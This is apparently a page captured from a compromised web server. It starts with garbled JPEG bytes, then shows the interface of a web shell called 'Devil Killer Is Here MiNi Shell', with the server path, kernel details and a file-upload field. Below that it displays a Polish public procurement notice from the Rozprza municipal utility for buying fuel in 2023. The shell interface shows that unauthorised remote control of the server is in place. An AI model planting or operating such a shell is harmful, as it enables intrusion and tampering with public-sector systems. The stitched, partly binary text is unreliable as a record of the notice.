JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221205/0047541701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup paliwa do samochodów służbowych i sprzętu budowlanego na rok 2023. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Gospodarki Komunalnej Gminy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590318937</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sportowa 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rozprza</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-340</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">446158093</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zgkg.rozprza@gmail.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.rozprza.pl/631/159/przetargi-zakladu-gospodarki-komunalnej-w-rozprzy.html</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Usługi komunalne i wod-kan </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup paliwa do samochodów służbowych i sprzętu budowlanego na rok 2023. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5d8773c0-747f-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00475417</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00020830/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa paliwa do pojazdów ZGKG</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">: 1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między zamawiającym a wykonawcami odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl,<br/>poczty elektronicznej zgkg.rozprza@gmail.com, ePUAP https://epuap.gov.pl/wps/portal, Adres skrytki ePUAP:. Zakład Gospodarki<br/>Komunalnej Gminy w Rozprzy (/ZGKGRozprza/SkrytkaESP)<br/>Adres strony internetowej prowadzonego postępowania: https://miniportal.uzp.gov.pl<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>formularza do komunikacji.<br/>3. Wszelkie informacje dotyczące podjętych przez zamawiającego czynności w postępowaniu są umieszczane na stronie<br/>internetowej https://miniportal.uzp.gov.pl.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu,<br/>opisane zostały w instrukcji użytkowania systemu https://miniportal.uzp.gov.pl/ dostępnej pod adresem<br/>https://www.uzp.gov.pl/ezamowienia2/miniportal oraz regulaminie ePUAP,<br/>5. Korespondencja w postępowaniu i realizacja umowy prowadzona jest w języku polskim. Oznacza to, że wszelka korespondencja<br/>w języku obcym winna być złożona wraz z tłumaczeniem na język polski.<br/>6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub<br/>wniosku oraz do komunikacji wynosi 150 MB.<br/>7. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 Pzp, podmiotowych środków dowodowych,<br/>przedmiotowych środków dowodowych oraz innych informacji oświadczeń lub dokumentów, przekazywanych w postępowaniu,<br/>przyjmuje się datę ich przekazania na ePUAP.<br/>8. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być<br/>zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. poz. 2452) oraz rozporządzenia Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. poz. 2415).<br/>9. Komunikacja pomiędzy zamawiającym, a wykonawcami (nie dotyczy składania ofert) w szczególności składanie oświadczeń,<br/>wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza:<br/>Formularz do komunikacji dostępnego na ePUAP oraz udostępnionego przez miniPortal.<br/>10. Wykonawca nie szyfruje korespondencji przesyłanej za pomocą Formularza do komunikacji.<br/>11. We wszelkiej korespondencji związanej z niniejszym postępowaniem zamawiający i wykonawcy posługują się numerem<br/>referencyjnym sprawy, tj. ZGKG/1538 /2022 Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub<br/>oświadczeń składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza<br/>również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za<br/>pomogą poczty elektronicznej na adres email zgkg.rozprza@gmail.com (z wyłączeniem składania ofert).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) Administratorem Pani/Pana danych osobowych jest<br/>Zakład Gospodarki Komunalnej Gminy w Rozprzy, z siedzibą 97-340 Rozprza, ul. Sportowa 7, tel. 44<br/>6158093, adres e-mail: zgkg.rozprza@gmail.com<br/>2) Administrator wyznaczył inspektora ochrony danych, z którym może się Pani/Pan kontaktować we<br/>wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw<br/>związanych z przetwarzaniem danych: pisemnie na adres naszej siedziby lub poprzez e-mail:<br/>iod_zgkg@rozprza.pl<br/>3) Pani/Pana dane będą przetwarzane w celu prowadzenia przedmiotowego postępowania o<br/>udzielenie zamówienia publicznego oraz jego rozstrzygnięcia, jak również zawarcia umowy w sprawie<br/>zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie<br/>zamówienia publicznego i jego archiwizacji, 4) podstawą przetwarzania Pani/Pana danych osobowych jest niezbędność wypełnienia przez<br/>Administratora obowiązku prawnego, a podstawą prawną jest art. 6 ust. 1 lit. c RODO w związku z<br/>ustawą z 11 września 2019 r Prawo zamówień publicznych (Pzp) (Dz.U.2019.2019),<br/>5) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp oraz Urząd Zamówień<br/>Publicznych prowadzący miniPortal do komunikacji elektronicznej działający pod adresem<br/>https://miniportal.uzp.gov.pl,<br/>6) Pani/Pana dane osobowe będą przetwarzane na podstawie przepisów prawa, przez okres<br/>niezbędny do realizacji celów przetwarzania - zgodnie z art. 78 Pzp, zamawiający przechowuje protokół<br/>postępowania wraz z załącznikami przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia.Okres przechowywania liczony jest od dnia 1 stycznia roku następnego od daty zakończenia sprawy,<br/>7) obowiązek podania przez Panią/Pana danych osobowych jest wymogiem ustawowym określonym w<br/>Ogłoszenie nr 2021/BZP 00272194/01 z dnia 2021-11-17<br/>2021-11-17 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na<br/>podstawie: art. 275 pkt 2 ustawy - Dostawy<br/>przepisach ustawy Pzp związanym z udziałem w postepowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp,<br/>8) w związku z przetwarzaniem Pani/Pana danych osobowych przysługują Pani/Panu, z wyjątkami<br/>Ogłoszenie nr 2021/BZP 00260800/01 z dnia 2021-11-08<br/>2021-11-08 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w<br/>trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Dostawy<br/>zastrzeżonymi przepisami prawa, następujące uprawnienia: • na podstawie art. 15 RODO prawo<br/>dostępu do danych osobowych jej dotyczących; • na podstawie art. 16 RODO prawo do sprostowania<br/>danych osobowych, przy czym skorzystanie z prawa do sprostowania nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności<br/>protokołu postępowań oraz jego załączników; • na podstawie art. 18 RODO prawo do żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w<br/>celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania<br/>danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia; • prawo wniesienia<br/>skargi do organu nadzorczego właściwego w sprawach ochrony danych osobowych, tj. Prezesa<br/>Urzędu Ochrony Danych Osobowych, na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez Administratora.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">: 9) nie przysługuje Pani/Panu w związku z art. 17 ust. 3 lit.<br/>b, d lub e RODO prawo do usunięcia danych osobowych oraz nie przysługuje prawo do przenoszenia<br/>danych osobowych, o których mowa w art. 20 RODO,<br/>10) nie przysługuje Pani/Panu na podstawie art. 21 RODO prawo do sprzeciwu, wobec przetwarzania<br/>danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c,<br/>11) Pani/Pana dane nie będą przetwarzane w sposób zautomatyzowany i nie będą przetwarzane w<br/>celu profilowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZGKG / 1538 / 2022 II</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest zakup paliwa do samochodów służbowych i sprzętu drogowego 2023 roku:<br/>• Benzyny bezołowiowej Pb 95 – szacunkowa ilość 4 000 litrów,<br/>• Oleju napędowego - szacunkowa ilość 70 000 litrów<br/>• Benzyna bezołowiowa Pb 98 - szacunkowa ilość 1 000 litrów<br/>Wyżej określone zamówienia są szacunkowe i mogą ulec zmianom w zakresie +-20% - w zależności od rzeczywistych<br/>potrzeb Zamawiającego. Zamawiający dopuszcza możliwość przesunięć ilościowych pomiędzy powyższymi rodzajami<br/>paliw, jednak suma cen wszystkich dostarczanych paliw nie może przekroczyć ceny oferty. 2.Paliwa będące przedmiotem zamówienia muszą spełniać:<br/>2.1. wymagania określone w Rozporządzeniu Ministra Gospodarki i Pracy z dnia 09.12.2008r.<br/>w sprawie wymagań jakościowych dla paliw ciekłych (Dz. U. z 16.12.2008r. nr 221 poz. 1441<br/>z późn. zm.)<br/>2.2. wymogi jakościowe aktualnych edycji Polskich Norm - EN dla Benzyny bezołowiowej Pb 95<br/>i dla oleju napędowego,<br/>3. Sposób realizacji przedmiotu zamówienia:<br/>3.1. tankowanie paliw stanowiących przedmiot zamówienia nastąpi bezpośrednio do zbiorników samochodowych oraz<br/>sprzętu i odbywać się będzie sukcesywnie – w zależności od potrzeb w stacjach paliwowych Wykonawcy zlokalizowanych w<br/>granicach administracyjnych powiatu piotrkowskiego – w promieniu 3 km od Bazy Zakładu Gospodarki Komunalnej Gminy w<br/>Rozprzy w powiecie piotrkowskim. Dopuszczamy możliwość tankowania za pomocą kart paliwowych.<br/>3.2 wykaz marek i numerów rejestracyjnych pojazdów oraz listę upoważnionych pracowników Zamawiającego do<br/>tankowania paliwa na stacjach wykonawcy wyłonionego podczas przetargu Zamawiający przekaże Wykonawcy przed<br/>podpisaniem umowy.<br/>3.3. Wykonawca na żądanie Zamawiającego zobowiązany będzie przedstawić świadectwa jakości paliw,<br/>4. Sposób rozliczeń zrealizowanych dostaw:<br/>Rozliczenie zakupionego paliwa nastąpi w okresach co 2 tygodnie fakturami VAT wystawionymi przez Wykonawcę na<br/>podstawie zestawienia wszystkich transakcji. Za datę sprzedaży uznaje się ostatni dzień danego okresu rozliczeniowego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09134100-8 - Olej napędowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09132100-4 - Benzyna bezołowiowa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>Rozdziale 15 SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: 1) zdolności do<br/>występowania w obrocie gospodarczym: Zamawiający nie określa w tym zakresie żadnych warunków;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>a Warunek zamawiający uzna za spełniony przypadku, gdy wykonawca przedłoży: aktualną koncesję wydana przez<br/>Prezesa Urzędu Regulacji Energetyki zezwalającą na dystrybucje i obrót paliwami stanowiącymi przedmiot zamówienia. Ocena spełnienia przez wykonawców warunku zostanie dokonana w oparciu o informacje zawarte w złożonych wraz z<br/>ofertą oświadczeniach lub dokumentach na zasadzie: spełnia/nie spełnia.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców ww. warunek zostanie uznany przez<br/>zamawiającego za spełniony, jeżeli spełni go samodzielnie co najmniej jeden z wykonawców składających ofertę wspólną.<br/>3) sytuacji ekonomicznej lub finansowej: Zamawiający nie określa w tym zakresie żadnych warunków;<br/>4) zdolności technicznej lub zawodowej:<br/>Warunek zamawiający uzna za spełniony przypadku, gdy wykonawca wskaże stację paliw w odległości nie większej niż 3<br/>km od siedziby ZGKG ul. Sportowa 7 97-340 Rozprza <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dokumenty i oświadczenia składane przez Wykonawcę wraz z ofertą:<br/>1) aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz<br/>o braku podstaw do wykluczenia z postępowania – zgodnie z załącznikiem do SWZ,<br/>2) informacje zawarte w oświadczeniu, o którym mowa w pkt 1 ppkt 1) stanowią wstępne<br/>potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu,<br/>3) w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym<br/>mowa w pkt 1 ppkt 1), składa każdy z wykonawców. Oświadczenie potwierdza brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu,2) wykaz stacji paliw w promieniu 3 km od siedziby<br/>ZGKG.<br/>4) wykaz stacji paliw w promieniu 3 km od siedziby ZGKG.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zasady składania oferty przez WYKONAWCÓW WSPÓLNIE ubiegających się o udzielenie<br/>zamówienia w tym SPÓŁKI CYWILNE:<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. spółka cywilna,<br/>konsorcjum). W takim przypadku Wykonawcy ponoszą solidarną odpowiedzialność za<br/>wykonanie umowy;<br/>2) w przypadku wspólnego ubiegania się o udzielenie zamówienia, Wykonawcy wskazują w<br/>formularzu oferty dane wszystkich podmiotów wspólnie ubiegających się o udzielenie<br/>zamówienia oraz ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania ich w postępowaniu o udzielenie zamówienia i<br/>zawarcia umowy w sprawę zamówienia publicznego. Do oferty należy załączyć to<br/>pełnomocnictwo;<br/>3) w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają usługi do których te zdolności są wymagane;<br/>4) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia są zobowiązani złożyć<br/>oświadczenie, o którym mowa w art. 117 ust. 4 Pzp, określające, które usługi wykonają<br/>poszczególni Wykonawcy (PKT 9 FORMULARZA OFERTY stanowiącego załącznik do SWZ);<br/>5) w przypadku wspólnego ubiegania się o udzielenie zamówienia, oświadczenie, o którym<br/>mowa w art. 125 ust. 1 (załącznik do SWZ) składa każdy Wykonawca. Oświadczenie to 